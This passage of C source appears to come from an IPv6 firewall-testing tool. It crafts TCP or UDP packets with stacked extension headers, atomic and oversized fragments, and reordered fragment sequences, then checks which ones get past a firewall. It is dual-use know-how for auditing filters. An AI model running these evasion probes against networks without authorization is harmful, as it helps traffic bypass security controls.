"TCP" : "UDP", argv[optind + 1], port); printf("Run a sniffer behind the firewall to see what passes through\n\n"); curr = 0; /* ----------------- BEGIN OF TEST CASES ---------------- */ if (only == ++count || only == 0) { printf("Test %2d: plain sending\t\t\t", count); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: plain sending with data\t", count); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 1000) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 1000) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: IPv4 ethernet type\t\t", count); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == 
NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; if (do_hdr_size) { if (do_pppoe) { hdr->pkt[20 + do_hdr_off] = 0; // PPP protocol value for IPv4 hdr->pkt[21 + do_hdr_off] = 0x21; } else if (do_hdr_vlan && do_6in4 == 0) { hdr->pkt[16] = 8; // ethernet protocol value for IPv4 hdr->pkt[17] = 0; } } else { hdr->pkt[12] = 8; // ethernet protocol value for IPv4 hdr->pkt[13] = 0; } if (do_6in4 == 0) { while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); } else printf("skipped (6in4)\n"); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: hop-by-hop hdr (ignore option)\t", count); poffset = 8; ptype = NXT_HBH; poffset2 = 34; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: dst hdr (ignore option)\t", count); poffset = 
8; ptype = NXT_DST; poffset2 = 34; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: hop-by-hop hdr router alert\t", count); poffset = 8; ptype = NXT_HBH; poffset2 = 34; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); buf[0] = 5; buf[1] = 2; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 3x dst hdr (ignore option)\t", count); poffset = 3 * 8; ptype = NXT_DST; poffset2 = 34 + 2*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; 
memset(buf, 0, 6); for (i = 0; i < 3; i++) if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 130x dst hdr (ignore option)\t", count); poffset = 130 * 8; ptype = NXT_DST; poffset2 = 34 + 129 * 8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, 6); for (i = 0; i < 130; i++) if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: atomic fragment\t\t", count); poffset = 8; ptype = NXT_FRAG; poffset2 = 34; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + 
count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2x atomic fragment (same id)\t", count); poffset = 2 * 8; ptype = NXT_FRAG; poffset2 = 34 + 1*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 2; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2x atomic fragment (diff id)\t", count); poffset = 2 * 8; ptype = NXT_FRAG; poffset2 = 34 + 1*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 2; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count*512 + i) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, 
&pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 3x atomic fragment (same id)\t", count); poffset = 3 * 8; ptype = NXT_FRAG; poffset2 = 34 + 2*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 3; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 3x atomic fragment (diff id)\t", count); poffset = 3 * 8; ptype = NXT_FRAG; poffset2 = 34 + 2*8; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 3; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count*512 + i) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, 
&pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 130x atomic fragment (same id)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 130; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 130x atomic fragment (diff id)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 130; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count*512 + i) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while 
(thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 260x atomic fragment (same id)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 260; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_FRAG, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_FRAG, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 260x atomic fragment (diff id)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; for (i = 0; i < 260; i++) if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count*512 + i) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_FRAG, hdr->pkt + 40 + offset, 
hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_FRAG, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2kb dst hdr\t\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2kb dst + dst hdr\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = 
(thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 32x 2kb dst hdr\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); for (i = 0; i < 32; i++) if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 2x dst hdr + 2x frag\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, 
&pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: 4x dst hdr + 3x frag\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 2040 - 2) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); hdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); thc_send_as_fragment6(interface, src, dst, NXT_DST, hdr->pkt + 40 + offset, hdr->pkt_len - 40 - offset, 1240); check_for_reply(); pkt = thc_destroy_packet(pkt); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first+middle\t\t", count); poffset = 0; ptype = 
NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first 
(2nd)\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || 
